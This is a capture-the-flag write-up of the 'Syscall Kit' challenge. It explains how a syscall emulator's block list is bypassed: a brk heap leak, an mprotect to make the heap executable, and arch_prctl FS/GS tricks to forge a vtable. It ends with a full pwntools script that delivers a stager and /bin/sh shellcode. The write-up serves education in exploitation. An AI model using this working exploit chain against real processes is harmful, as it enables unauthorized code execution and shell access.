Syscall Kit
zer0pts 2020 - Syscall Kit
Overview
Syscall Kit is a hard rated pwnable challenge created by ptr-yudai.
It is simply an emulator written in C++ that’s used to execute user-provided system calls.
There are some restrictions however, and our goal is to pop shell from this somewhat restricted sandbox.
You can download the challenge attachments here
Analysis
The challenge just contains two files:
- chall
- main.cpp
Here are the protections enabled on the binary.
1
2
3
4
5
6
7
8
9
mark@rwx:~/Desktop/Practice/BinExp/Challs/STACK/SyscallKit$ checksec chall
[*] '/home/mark/Desktop/Practice/BinExp/Challs/STACK/SyscallKit/chall'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
Stripped: No
mark@rwx:~/Desktop/Practice/BinExp/Challs/STACK/SyscallKit$
When we run the program, we are asked to give it a syscall number and its arguments.
In this case, I used the exit syscall (sys_num == 60), and from the return value we can see that it does in fact do what it says.
Since we are given the source code, we don’t have to reverse engineer the binary.
Here’s the source:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
/**
* syscall kit - WinterKosenCTF 2020
*
* This application is (maybe) made for educational purpose
* and for those who learn system calls.
*/
#include <iostream>
#include <sys/syscall.h>
class Emulator {
private:
unsigned long rax;
unsigned long rdi;
unsigned long rsi;
unsigned long rdx;
virtual void set(std::string, unsigned long&);
virtual int check();
virtual void syscall();
public:
Emulator();
virtual void emulate();
};
/**
* Constructor
*/
Emulator::Emulator() {
this->rax = 0;
this->rdi = 0;
this->rsi = 0;
this->rdx = 0;
}
/**
 * Read system call number and arguments
 *
 * Prints the prompt `msg` to std::cout, then parses one unsigned long from
 * std::cin directly into `reg` (a reference to one of the register fields).
 * If the stream is not in a good state after the extraction, the process
 * exits with status 1.
 */
void Emulator::set(std::string msg, unsigned long &reg) {
  std::cout << msg;
  std::cin >> reg;
  if (!std::cin.good()) exit(1);
}
/**
* Filter dangerous system calls
*/
int Emulator::check() {
if (this->rax >= 0x40000000) return 1; // x32 ABI is dangerous!
if (this->rax == SYS_open) return 1; // never open files
if (this->rax == SYS_openat) return 1;
if (this->rax == SYS_write) return 1; // no more leak
if (this->rax == SYS_read) return 1; // no more overwrite
if (this->rax == SYS_sendfile) return 1;
if (this->rax == SYS_execve) return 1; // of course not!
if (this->rax == SYS_execveat) return 1;
if (this->rax == SYS_ptrace) return 1; // may ruine the program
if (this->rax == SYS_fork) return 1;
if (this->rax == SYS_vfork) return 1;
if (this->rax == SYS_clone) return 1;
return 0;
}
/**
* Call syscall
*/
void Emulator::syscall() {
asm volatile ("movq %0, %%rdi":: "a"(this->rdi));
asm volatile ("movq %0, %%rsi":: "a"(this->rsi));
asm volatile ("movq %0, %%rdx":: "a"(this->rdx));
asm volatile ("movq %0, %%rax":: "a"(this->rax));
asm volatile ("syscall");
asm volatile ("movq %%rax, %0": "=a"(this->rax));
}
/**
* Run emulator
*/
void Emulator::emulate(void)
{
int i;
for(i = 0; i < 10; i++) {
std::cout << "=========================" << std::endl;
this->set("syscall: ", this->rax);
this->set("arg1: ", this->rdi);
this->set("arg2: ", this->rsi);
this->set("arg3: ", this->rdx);
std::cout << "=========================" << std::endl;
if (this->check()) {
std::cerr << "syscall=" << this->rax << " is not allowed" << std::endl;
continue;
} else {
this->syscall();
std::cout << "retval: " << std::hex << this->rax << std::endl;
}
}
std::cout << "Bye!" << std::endl;
}
Emulator *m;
void setup(void)
{
std::setbuf(stdin, NULL);
std::setbuf(stdout, NULL);
std::setbuf(stderr, NULL);
m = new Emulator();
}
int main(void)
{
setup();
m->emulate();
exit(0);
}
The code is small, but I’ll walk through each section.
First, there is a class named Emulator. It contains four private attributes representing the registers used by the x86_64 system call calling convention, along with three private virtual methods (set, check, syscall) and one public virtual method (emulate).
1
2
3
4
5
6
7
8
9
10
11
12
13
class Emulator {
private:
unsigned long rax;
unsigned long rdi;
unsigned long rsi;
unsigned long rdx;
virtual void set(std::string, unsigned long&);
virtual int check();
virtual void syscall();
public:
Emulator();
virtual void emulate();
};
This is the constructor. It simply initializes all of the object’s register fields to zero:
1
2
3
4
5
6
Emulator::Emulator() {
this->rax = 0;
this->rdi = 0;
this->rsi = 0;
this->rdx = 0;
}
The main function first initializes the object then calls the emulate method:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
void setup(void)
{
std::setbuf(stdin, NULL);
std::setbuf(stdout, NULL);
std::setbuf(stderr, NULL);
Emulator *m = new Emulator();
}
int main(void)
{
setup();
m->emulate();
exit(0);
}
The emulate method runs for 10 iterations. On each iteration, it sets the object’s register fields using Emulator::set.
After the registers are set, it calls Emulator::check: if the return value is non-zero, it reports that the syscall is not allowed and continues with the next iteration; otherwise it calls Emulator::syscall and prints the return value.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
void Emulator::emulate(void)
{
int i;
for(i = 0; i < 10; i++) {
std::cout << "=========================" << std::endl;
this->set("syscall: ", this->rax);
this->set("arg1: ", this->rdi);
this->set("arg2: ", this->rsi);
this->set("arg3: ", this->rdx);
std::cout << "=========================" << std::endl;
if (this->check()) {
std::cerr << "syscall=" << this->rax << " is not allowed" << std::endl;
continue;
} else {
this->syscall();
std::cout << "retval: " << std::hex << this->rax << std::endl;
}
}
std::cout << "Bye!" << std::endl;
}
/**
 * Read system call number and arguments
 *
 * Prints the prompt `msg` to std::cout, then parses one unsigned long from
 * std::cin directly into `reg`. If the stream is not in a good state after
 * the extraction, the process exits with status 1.
 */
void Emulator::set(std::string msg, unsigned long &reg) {
  std::cout << msg;
  std::cin >> reg;
  if (!std::cin.good()) exit(1);
}
Our main point of interest is Emulator::check:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
int Emulator::check() {
if (this->rax >= 0x40000000) return 1; // x32 ABI is dangerous!
if (this->rax == SYS_open) return 1; // never open files
if (this->rax == SYS_openat) return 1;
if (this->rax == SYS_write) return 1; // no more leak
if (this->rax == SYS_read) return 1; // no more overwrite
if (this->rax == SYS_sendfile) return 1;
if (this->rax == SYS_execve) return 1; // of course not!
if (this->rax == SYS_execveat) return 1;
if (this->rax == SYS_ptrace) return 1; // may ruine the program
if (this->rax == SYS_fork) return 1;
if (this->rax == SYS_vfork) return 1;
if (this->rax == SYS_clone) return 1;
return 0;
}
This method prevents the use of specific system calls, as well as any syscall value that falls into the x32 ABI range.
Conceptually, it behaves like a simple seccomp filter. If the syscall number in rax matches one of the blocked syscalls, check() returns 1, meaning the syscall should be rejected. Unlike a seccomp rule using SCMP_ACT_KILL_PROCESS, however, a blocked syscall does not terminate the process: the emulator just prints a “not allowed” message and moves on to the next iteration (closer in spirit to SCMP_ACT_ERRNO). Note that a rejected attempt still uses up one of the 10 iterations.
As expected, Emulator::syscall uses inline assembly to load the CPU registers with the values stored in the object, then executes the syscall instruction.
After the syscall runs, its return value is placed in rax, and that value is then written back into the object’s rax field.
The return value is also printed in hexadecimal (as shown in the source code).
1
2
3
4
5
6
7
8
void Emulator::syscall() {
asm volatile ("movq %0, %%rdi":: "a"(this->rdi));
asm volatile ("movq %0, %%rsi":: "a"(this->rsi));
asm volatile ("movq %0, %%rdx":: "a"(this->rdx));
asm volatile ("movq %0, %%rax":: "a"(this->rax));
asm volatile ("syscall");
asm volatile ("movq %%rax, %0": "=a"(this->rax));
}
Exploitation
What’s the vulnerability?
Well, there actually isn’t any vulnerability
The challenge description says this:
1
It's a good tool to learn syscall, isn't it?
So we somehow need to leverage this emulator to trigger a syscall that would eventually spawn a shell.
Looking at the setup, we can only control three arguments of the syscall we choose.
At the same time, it blocks many of the syscalls that we could otherwise have easily used to gain a shell.
I’m going to be using this linux kernel syscall table as a reference
As of the latest kernel version (v6.17) there are 365 syscalls.
Does that mean we need to go through all 354 syscalls that are not blocked by the emulator?
Not necessarily…
The approach I took was to filter the syscalls based on the number of arguments they take.
There’s a json export of the syscall table here
I wrote a script to extract all the syscalls I can use that take three or fewer arguments.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import json

# Syscall numbers rejected by Emulator::check: read, write, open, openat,
# sendfile, execve, execveat, ptrace, fork, vfork, clone.
NUMBER = [0, 1, 2, 0x101, 0x28, 0x3b, 0x142, 0x65, 0x39, 0x3a, 0x38]
# JSON export of the syscall table.
TABLE = "table.json"

with open(TABLE, "r") as f:
    dataset = json.load(f)

syscalls = dataset["syscalls"]
output = {
    "syscall": []
}

# Keep only syscalls that take at most three arguments (the emulator only
# lets us set rdi, rsi and rdx) and that are not on the block list.
for syscall in syscalls:
    if (len(syscall["signature"]) <= 3) and (syscall["number"] not in NUMBER):
        output["syscall"].append(syscall)

# print(len(output["syscall"]))
print(json.dumps(output))
Doing that, though, only reduces the number of candidate syscalls to 236.
It’s still a lot.
I was thinking of spinning up a local instance of the syscall table since it’s open source, but that’s a lot of work and, to be fair, it didn’t exist back in 2020.
Luckily the UI is awesome, it has a view where we can see the arguments needed.
My goal remained the same: check out the syscalls that take three or fewer arguments.
Here are the syscalls I found interesting to check:
1
2
3
4
5
6
int brk(void *addr);
int mprotect(unsigned long start, size_t len, unsigned long prot);
ssize_t readv(int fd, const struct iovec *iov, int iovcnt);
ssize_t writev(int fd, const struct iovec *iov, int iovcnt);
int syscall(SYS_arch_prctl, int op, unsigned long addr);
// ....
Firstly, we need to make our goal clear. Our goal is to gain $rip control.
What possible way can this be achieved?
One way would be a virtual function table (vtable) hijack.
C++ is an object oriented programming language.
Virtual functions are a key mechanism to support polymorphism in C++.
For each class with virtual functions, depending on the class inheritance hierarchy, the compiler will create one or more associated virtual function tables (vtables).
Looking at the object’s initialization, we can see that the Emulator instance is allocated on the heap:
1
2
3
4
5
6
7
8
void setup(void)
{
std::setbuf(stdin, NULL);
std::setbuf(stdout, NULL);
std::setbuf(stderr, NULL);
m = new Emulator();
}
Here’s the heap layout after initialization:
gef> emu_dump 0x5555556162b0
====== Emulator @ 0x5555556162b0 ======
[+] vtable : 0x555555602ce0
[+] virtual functions
[0] -> 0x555555401114
[1] -> 0x55555540116e
[2] -> 0x555555401290
[3] -> 0x5555554012d8
===============================
This is the gdb script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
define emu_dump
set $base = (char *)$arg0
printf "====== Emulator @ %p ======\n", $base
set $vtable = *(void **)$base
printf "[+] vtable : %p\n", $vtable
printf "[+] virtual functions\n"
set $i = 0
while $i < 4
set $fn = *(void **)($vtable + ($i * 8))
printf " [%d] -> %p\n", $i, $fn
set $i = $i + 1
end
printf "===============================\n"
end
Because the vtable pointer itself resides in a heap-allocated object, it becomes a writable target.
If we can forge the vtable, then any subsequent virtual method call on the object would dereference our fake vtable and jump to our controlled function pointer instead.
But before we perform a write, we need to know the location of the heap.
Reading the man page for brk
1
Calling sbrk() with an increment of 0 can be used to find the current location of the program break.
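The program break marks the point where the heap currently ends in the process’s virtual address space.
The raw brk system call (which is what the emulator issues) behaves in a similar way: when it cannot honour the requested address, such as 0, it returns the current program break, so brk(0) leaks the end of the heap.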
Here’s the helper function I wrote:
1
2
3
4
5
6
7
8
def syscall(sys_num, rdi=0, rsi=0, rdx=0):
    """Drive one iteration of the emulator and return the syscall's result.

    Answers the four prompts ("syscall:", "arg1:", "arg2:", "arg3:") with the
    given values written in decimal, then reads the line following
    "retval: " and parses it as hexadecimal (the emulator prints the return
    value with std::hex).

    Relies on the module-level tube `io`.
    """
    io.sendlineafter(b"syscall:", str(sys_num).encode())
    io.sendlineafter(b"arg1:", str(rdi).encode())
    io.sendlineafter(b"arg2:", str(rsi).encode())
    io.sendlineafter(b"arg3:", str(rdx).encode())
    io.recvuntil(b"retval: ")
    ret = int(io.recvline(), 16)
    return ret
We can leak the heap address by doing this:
1
2
3
4
PAGE = 0x21000
brk = 0xc
heap_base = syscall(brk, 0) - PAGE
info("heap base: %#x", heap_base)
If you think about it, we now have the heap address, but we still don’t know any other address in memory (e.g. libc), and to corrupt a vtable we need some form of arbitrary write primitive.
The reason we would need a libc leak is to be able to call functions like system or a one gadget, but that would require us to build an arbitrary read as well.
In essence, that increases the number of syscalls we have to make, and remember that we only get 10 of them.
A way around that is to change the heap protection to (PROT_READ | PROT_WRITE | PROT_EXEC) making the heap region RWX.
1
2
mprotect = 0xa
syscall(mprotect, heap_base, PAGE, 0x7)
With that we can simply just jump to the heap and get shellcode execution going.
But now how do we corrupt the vtable?
This was where the issue began!
While going through the syscalls, I found an interesting system call called arch_prctl.
1
2
int syscall(SYS_arch_prctl, int op, unsigned long addr);
int syscall(SYS_arch_prctl, int op, unsigned long *addr);
It says:
- when we use the ARCH_SET_FS subfunction, we are able to set the 64-bit base for the FS register to addr
- while ARCH_GET_FS returns the 64-bit base value for the FS register of the calling thread and stores it in the memory pointed to by addr
The same goes for the GS register (ARCH_SET_GS / ARCH_GET_GS).
In case you don’t know what the FS and GS registers are: they’re segment registers, but on modern 64-bit systems they’re mostly used for thread-local and CPU-local data.
You can check it out here
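The important thing, however, is that this gives us a form of arbitrary write: ARCH_SET_FS lets us choose a 64-bit value, and a following ARCH_GET_FS stores that value at an address of our choosing.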
We can quickly test it out:
1
2
3
arch_prctl = 0x9e
syscall(arch_prctl, ARCH_SET_FS, 0x414141414141)
syscall(arch_prctl, ARCH_GET_FS, vtable_addr)


At this point, we’ve corrupted the fs_base register.
But once the program returns to Emulator::emulate, it crashes.

This makes sense, because the fs register is constantly referenced during program execution (e.g. reading the stack canary at fs:0x28).
This forces us to only write valid (mapped) addresses through FS, which slightly constrains the primitive.
However, this isn’t a major obstacle because we can now overwrite the object’s vtable pointer itself.
But how to gain $rip from this?
Here’s what I initially did.
As you may have noticed, the third syscall argument is not actually used by arch_prctl (it only takes two arguments), but the emulator still stores it in the object’s rdx field and we fully control its value. That makes it a convenient place to stage data.
So the idea is to construct a fake object layout like this:
1
2
*(uintptr_t*)fake_obj = &this->arg3;
this->vtable = &fake_obj;
With this setup, when Emulator::emulate next calls this->set (a virtual call), execution dereferences the corrupted vtable pointer, reads the first entry of our fake vtable, and jumps to it.
That function pointer resolves to &this->arg3, whose contents we control directly.
Since that is where we staged our shellcode (and the heap is now executable), we get shellcode execution; the restriction is that the shellcode can only be 8 bytes long.
Here’s a sample:
1
2
3
4
5
6
7
8
9
10
arch_prctl = 0x9e
emu_obj = heap_base + 0x122b0
vtable_addr = heap_base + 0x200
vtable = emu_obj + 0x20
syscall(arch_prctl, ARCH_SET_FS, vtable)
syscall(arch_prctl, ARCH_GET_FS, vtable_addr)
syscall(arch_prctl, ARCH_SET_FS, vtable_addr)
syscall(arch_prctl, ARCH_GET_FS, emu_obj, 0x9090909090909090)

The method Emulator::set is called back at Emulator::emulate:
1
this->set("syscall: ", this->rax);
This is the register state at the point of the program executing our shellcode.
Ideally, we would want to create a staged shellcode (i.e. one that performs a read syscall):
1
ssize_t read(int fd, void buf[.count], size_t count)
The reason is that we can’t do much with just 8 bytes.
For a staged execution we can use the initial control flow to trigger a second-stage payload that lives elsewhere (e.g. heap), then jump into that.
We only need to control 4 registers (rax, rdi, rsi, rdx).
In our case, all registers are populated by the emulator’s calling convention, which makes clean syscall setup difficult.
This was the shortest shellcode I could come up with.
1
2
3
4
5
xor eax, eax
mov edi, eax
mov rsi, [rsp+0x10]
shr edx, 0x1
syscall
It requires 13 bytes, which is too much for the 8 bytes we have.
What now?
I decided to check the second pair of subfunctions (ARCH_SET_GS / ARCH_GET_GS, i.e. writing to and reading from GS).
They behave in a similar way; however, they don’t require that the value we pass in is a valid address.



This is good, because recall that our shellcode is 13 bytes: with only 8 bytes fully controllable through arg3, we’re left with 5 bytes to place.
With this arbitrary write, we can place the remaining bytes at (uint8_t*)&this->arg3 + 8.
Actually, I did notice a thing with writing to the segment registers.
It can only store up to a certain value.
Checking the kernel source code for the syscall handler do_arch_prctl_64
If the value we want to write is greater than or equal to TASK_SIZE_MAX, it returns -EPERM
1
#define EPERM 1 /* Operation not permitted */
Cross-referencing this, we end up at the following kernel trace:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#define TASK_SIZE_MAX task_size_max()
static __always_inline unsigned long task_size_max(void)
{
unsigned long ret;
alternative_io("movq %[small],%0","movq %[large],%0",
X86_FEATURE_LA57,
"=r" (ret),
[small] "i" ((1ul << 47)-PAGE_SIZE),
[large] "i" ((1ul << 56)-PAGE_SIZE));
return ret;
}
#define X86_FEATURE_LA57 (16*32+16) /* "la57" 5-level page tables */
All this is doing is defining the maximum user-space virtual address range. In other words, it sets the upper boundary of valid user-mode addresses, ensuring we can’t map or use pointers outside of user space.
Anyway, our remaining 5 bytes (40 bits) are small enough to fit within this range.
Here’s the final solve:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
exe = context.binary = ELF('chall')
context.terminal = ['gnome-terminal', '--maximize', '-e']
context.log_level = 'info'
def start(argv=[], *a, **kw):
    """Start the target and return the tube used to talk to it.

    - with the GDB argument set: run the binary under gdb with `gdbscript`
    - with the REMOTE argument set: connect to the host/port given as the
      first two command-line arguments
    - otherwise: spawn the binary as a local process
    """
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)
gdbscript = '''
brva 0x12C4
continue
'''.format(**locals())
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
def init():
    """Open the connection to the target and publish it as the global `io`."""
    global io
    io = start()
def syscall(sys_num, rdi=0, rsi=0, rdx=0):
    """Drive one iteration of the emulator and return the syscall's result.

    Answers the four prompts ("syscall:", "arg1:", "arg2:", "arg3:") with the
    given values written in decimal, then reads the line following
    "retval: " and parses it as hexadecimal (the emulator prints the return
    value with std::hex).

    Relies on the module-level tube `io` set up by init().
    """
    io.sendlineafter(b"syscall:", str(sys_num).encode())
    io.sendlineafter(b"arg1:", str(rdi).encode())
    io.sendlineafter(b"arg2:", str(rsi).encode())
    io.sendlineafter(b"arg3:", str(rdx).encode())
    io.recvuntil(b"retval: ")
    ret = int(io.recvline(), 16)
    return ret
def solve():
    """Run the full exploit chain against the emulator and drop into a shell.

    Steps (each `syscall(...)` call consumes one of the 10 emulator rounds):
      1. leak the heap base with brk(0)
      2. make the heap RWX with mprotect
      3. use arch_prctl SET_FS/GET_FS pairs as a write primitive to build a
         fake vtable whose first entry points at the object's arg3 (rdx) field
      4. use SET_GS/GET_GS to place the tail of the 13-byte stager right
         after arg3
      5. overwrite the object's vtable pointer; the same round stores the
         first 8 stager bytes in arg3
      6. send the second-stage shellcode for the stager's read() to consume
    """
    # Syscall numbers.
    brk = 0xc
    mprotect = 0xa
    arch_prctl = 0x9e

    # arch_prctl subfunction codes.
    ARCH_SET_GS = 0x1001
    ARCH_SET_FS = 0x1002
    ARCH_GET_FS = 0x1003
    ARCH_GET_GS = 0x1004

    # Distance from the heap base to the program break returned by brk(0).
    PAGE = 0x21000
    pack = lambda data: int.from_bytes(data, byteorder='little')

    heap_base = syscall(brk, 0) - PAGE
    info("heap base: %#x", heap_base)

    emu_obj = heap_base + 0x122b0      # the heap-allocated Emulator object
    vtable_addr = heap_base + 0x200    # where the fake vtable is built
    vtable = emu_obj + 0x20            # address of the arg3 (rdx) field

    # PROT_READ | PROT_WRITE | PROT_EXEC on the whole heap.
    syscall(mprotect, heap_base, PAGE, 0x7)

    # Fake vtable entry 0 = &arg3: set FS to the value, then have GET_FS
    # store it at vtable_addr.
    syscall(arch_prctl, ARCH_SET_FS, vtable)
    syscall(arch_prctl, ARCH_GET_FS, vtable_addr)

    # 13-byte stager: read(0, [rsp+0x10], edx >> 1).
    sc = asm(
        """
        sc:
            xor eax, eax
            mov edi, eax
            mov rsi, [rsp+0x10]
            shr edx, 0x1
            syscall
        """
    )

    # Only 8 bytes fit in arg3; write the remaining 5 bytes just after it
    # through the GS base.
    cont = sc[8:]
    syscall(arch_prctl, ARCH_SET_GS, pack(cont))
    syscall(arch_prctl, ARCH_GET_GS, emu_obj + 0x28)

    # Point the object's vtable pointer at the fake vtable. The third
    # argument is ignored by arch_prctl but lands in arg3, which is how the
    # first 8 stager bytes get staged.
    syscall(arch_prctl, ARCH_SET_FS, vtable_addr)
    syscall(arch_prctl, ARCH_GET_FS, emu_obj, u64(sc[:8]))

    # Second stage: NOP sled followed by a /bin/sh shellcode.
    payload = asm("nop") * 0x100
    payload += asm(shellcraft.sh())

    io.send(payload)

    io.interactive()
def main():
    """Connect to the target, then run the exploit."""
    init()
    solve()


if __name__ == '__main__':
    main()
Running it works!












